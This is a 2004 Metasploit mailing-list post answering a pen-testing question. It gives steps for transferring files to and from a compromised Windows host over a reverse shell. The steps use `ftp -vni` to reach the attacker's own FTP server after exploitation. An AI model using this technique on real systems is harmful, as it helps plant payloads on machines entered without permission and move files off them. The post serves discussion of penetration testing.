Metasploit mailing list archives

Metasploit pen testing questions

From: phyoakl at myanmar.com.mm (Phyo Arkar Lwin)
Date: Tue, 16 Nov 2004 19:40:50 +0630

On Wednesday 10 November 2004 16:38, Regence 21 wrote:

On Win2k I can get a reverse shell easily and execute commands, but if
I try and start the Windows command line ftp client won't work (the
command line just sits there after I enter ftp). Am I missing
something? Without ftp, what is the easiest way to upload a file to a
Win2k target host?

I got that problem too . but i got a way around. when u dropped into the
shell , start the ftp with this option. eg `ftp -vni 192.168.1.2` .  it
will directly login to the  ftpserver (if u have one on 192.168.1.2) .
By that way u can download and upload files. Just normal `ftp host:port`
do not work well in cygwin enviroment with   WindowsXP. u can issue
commands but there is no echo returned.u need to turn on -vni options to
work. It works well on linux Tho. I have tried with Filezilla on my XP box.

I do like this

Setup Filezilla server on my Box
Exploit with Metasploit and
Drop into Remote shell
Change to directory that i wanna upload files.
start ftp with
`ftp -vni 192.168.1.2`
enter FTP User Pass on Prompt
Then put / get files to or from the exploited machine.
Done.